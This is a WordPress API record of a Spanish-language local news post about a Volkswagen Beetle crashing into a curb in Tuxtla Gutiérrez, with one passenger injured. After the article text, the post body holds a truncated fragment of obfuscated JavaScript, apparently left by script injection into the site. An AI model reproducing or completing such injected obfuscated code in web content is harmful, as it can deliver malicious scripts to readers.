{"id":12500,"date":"2023-11-09T03:04:45","date_gmt":"2023-11-09T03:04:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12500"},"modified":"2023-11-09T03:04:46","modified_gmt":"2023-11-09T03:04:46","slug":"vocho-se-estrella-en-las-palmas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12500","title":{"rendered":"Vocho se estrella en Las Palmas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699499013569-1024x576.jpg\" alt=\"\" class=\"wp-image-12501\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699499013569-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699499013569-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699499013569-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699499013569.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 8 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana el conductor de un VW Sed\u00e1n, de color negro se impact\u00f3 contra una banqueta mientras conduc\u00eda sobre la Avenida Presa Cecilio del Valle, esquina Presa Mazatepec de la Colonia Las Palmas de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, el escarabajo circulaba de Poniente a Oriente cuando de manera repentina le sali\u00f3 al paso una camioneta Honda CRV, lo que provoc\u00f3 que hiciera una maniobra para esquivarlo.Esto hizo que se estrellara contra una banqueta, y la copiloto terminara lesionada.Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana para atender a la lesionada.Finalmente el escarabajo fue llevado a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 8 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana el conductor de un VW Sed\u00e1n, de color negro se impact\u00f3 contra una banqueta mientras conduc\u00eda sobre la Avenida Presa Cecilio del Valle, esquina Presa Mazatepec de la Colonia Las Palmas de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12501,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12500","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12500"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12500\/revisions"}],"predecessor-version":[{"id":12502,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12500\/revisions\/12502"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12501"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}